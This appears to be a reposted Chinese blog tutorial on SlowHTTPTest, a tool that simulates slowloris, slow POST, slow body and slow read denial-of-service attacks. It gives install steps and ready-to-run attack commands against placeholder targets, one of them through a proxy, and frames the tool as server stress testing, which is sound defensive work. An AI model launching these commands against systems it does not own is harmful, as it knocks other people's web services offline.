SlowHTTPTest-慢速DoS攻击

Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。

SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。

Slowhttptest的源码托管在Github:https://github.com/shekyan/slowhttptest

在Kali Linux上安装SlowHTTPTest

# apt-get install slowhttptest 

如果你使用其他linux发行版,可以从源码编译安装:

$ ./configure
$ make
$ sudo make install

使用示例

man手册:

# man slowhttptest

帮助信息中提供了很多使用示例。

slowloris模式:

# slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3

生成图表(CSV和html格式):

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3

Slow Read模式:

# slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://yourtarget.com -p 5 -l 350 -e x.x.x.x:8080

x.x.x.x:8080是HTTP代理

实际测试

Slow Body攻击:

# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.mywebsite.com -x 10 -p 3

攻击开始,服务器端在几秒内的变化:

转载于:https://www.cnblogs.com/daoyi/p/SlowHTTPTestman-suDoS-gong-ji.html

slowhttptest-1.5.tar.gz,是一个用于测试HTTP服务器的工具。它是一个经过压缩的源代码文件,需要进行解压和编译方可使用。 slowhttptest主要用于模拟各种慢速HTTP攻击,以帮助服务器管理员检测和评估其系统的安全性和性能。它可以模拟各种攻击类型,例如慢速读取攻击、慢速头部攻击、慢速Post攻击等。 对于服务器管理员来说,使用slowhttptest可以帮助他们了解服务器在受到慢速攻击时的响应能力和抗压能力。通过对服务器进行模拟攻击,可以评估服务器的性能瓶颈和可能存在的安全漏洞,为管理员提供改进服务器设置和优化系统性能的建议。 使用slowhttptest需要具备一定的网络和服务器知识,因为需要根据测试需求设置攻击参数和目标URL。使用时,先将slowhttptest-1.5.tar.gz文件下载到本地,并解压缩,然后根据slowhttptest的官方文档提供的编译指南进行编译和安装。 编译和安装完成后,可以根据具体的测试需求,运行slowhttptest工具,指定攻击类型和参数,向目标服务器发起模拟攻击。slowhttptest会生成详细的测试结果报告,以便管理员进行分析和评估。 总结而言,slowhttptest-1.5.tar.gz是一个有助于测试HTTP服务器安全性和性能的工具。通过模拟慢速攻击,它能够帮助管理员评估服务器的抗压能力,找出可能存在的安全漏洞,并提供优化建议。使用前需要进行解压和编译安装,按照测试需求设置参数,然后进行测试,以获取详细的测试结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值